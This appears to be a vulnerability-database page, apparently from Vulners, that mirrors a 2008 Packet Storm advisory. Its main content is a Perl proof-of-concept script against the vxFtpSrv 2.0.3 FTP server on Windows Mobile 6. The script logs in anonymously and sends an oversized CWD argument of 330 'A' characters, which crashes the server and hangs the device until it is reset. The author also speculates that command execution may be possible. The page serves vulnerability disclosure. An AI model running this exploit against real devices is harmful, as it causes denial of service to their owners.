Lucene search
K

vxftpsrv-overflow.txt

🗓️ 02 Oct 2008 00:00:00Reported by Julien BedardType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

vxFtpSrv 2.0.3 CWD command Overflow PoC by Julien Bedard for MS Windows Mobile 6.

Code
`#!/usr/bin/perl  
########################################################  
#  
# vxFtpSrv 2.0.3 CWD command Overflow PoC  
# by Julien Bedard (www.kosseclab.com)  
# [email protected]  
#  
# Tested on MS Windows Mobile 6.0  
# (maybe other versions are vulnerable)  
#  
# vxftpsrv is the most common ftp  
# server for mobile devices: wm, ppc etc.  
# it suffer of an overflow when it recieve too long  
# data string by the CWD command.  
#  
# the result will be immediately close server and  
# the windows mobile device will really hang-up.  
# so it's required to reset the device to be completely  
# operational.  
#  
# Maybe we can exploit this issue for doing command  
# execution but i've not test it since i have nothing  
# to debug the application in real time.  
#  
# If you can help for further analysis please email me  
# at [email protected]  
#  
########################################################  
  
use Net::FTP;  
$wftpsrvaddr = "255.255.255.255";  
$overflow = "A" x 330;  
$user = "anonymous";  
$pass = "[email protected]";  
$port = 21;  
  
$ftp = Net::FTP->new("$wftpsrvaddr", Debug => 0) || die "Cannot connect to ftp server: $@";  
$ftp->login($user,$pass) || die "Cannot login ", $ftp->message;  
  
$ftp->cwd($overflow);  
$ftp->quit;  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Oct 2008 00:00Current
0.1Low risk
Vulners AI Score0.1
21